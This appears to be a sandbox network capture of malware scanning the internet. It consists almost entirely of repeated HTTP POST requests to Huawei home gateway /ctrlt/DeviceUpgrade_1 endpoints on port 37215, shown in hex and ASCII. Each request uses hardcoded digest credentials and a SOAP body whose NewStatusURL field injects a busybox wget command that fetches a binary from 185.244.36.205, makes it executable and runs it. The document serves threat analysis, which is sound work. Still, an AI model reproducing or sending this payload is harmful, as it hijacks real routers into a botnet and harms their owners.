                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1059192.168.2.1559960102.204.125.18237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929306984 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1060192.168.2.1546496222.200.214.21737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929325104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1061192.168.2.1535466121.74.171.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929327965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1062192.168.2.1560122222.48.233.22537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929366112 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1063192.168.2.154709645.244.8.20737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929371119 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1064192.168.2.154580631.238.215.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929373980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1065192.168.2.1550146201.195.182.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929409027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1066192.168.2.156085437.15.22.9537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929414034 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1067192.168.2.1546950190.160.82.11637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929430008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1068192.168.2.1559026102.6.63.5737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929464102 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
